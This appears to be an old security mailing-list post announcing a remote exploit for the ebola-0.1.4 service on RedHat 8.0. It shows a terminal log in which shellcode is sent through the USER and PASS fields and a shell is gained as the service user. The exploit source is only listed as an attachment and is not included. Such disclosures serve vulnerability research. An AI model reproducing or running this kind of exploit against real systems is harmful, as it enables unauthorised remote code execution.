Assuming "ebola" runned by sweep user (uid/gid == 333 :P) bash-2.05b$ id uid=333(sweep) gid=333(sweep) gruppi=333(sweep) bash-2.05b$ pwd /home/c0wboy/ebola-0.1.4 bash-2.05b$ ./ebola & [1] 2077 bash-2.05b$ exit exit [c0wboy@localhost ebola-0.1.4]$ cd $HOME [c0wboy@localhost c0wboy]$ gcc 0x333ebola.c -o ebola [c0wboy@localhost c0wboy]$ ./ebola -d localhost -t 0 --- 0x333ebola => ebola-0.1.4 remote exploit --- --- Outsiders Se(c)urity Labs 2003 --- _(0x0)_ Exploiting <localhost:1665> on RedHat 8.0 (Psyche) _(0x1)_ Connected (!) _(0x2)_ Sending USER (shellcode_1) _(0x3)_ Sending PASS (shellcode_2) (======owned======) (======owned======) (======owned======) Linux localhost.localdomain 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux uid=333(sweep) gid=333(sweep) groups=333(sweep) echo "owned!" > /tmp/cya.txt exit Pipe rotta [c0wboy@localhost c0wboy]$ ls -al /tmp/cya.txt -rw-rw-r-- 1 sweep sweep 7 dic 9 17:44 /tmp/cya.txt [c0wboy@localhost c0wboy]$ cat /tmp/cya.txt owned! [c0wboy@localhost c0wboy]$ *Note* exploit is very unstable.
Attachment:
0x333ebola.c
Description: Binary data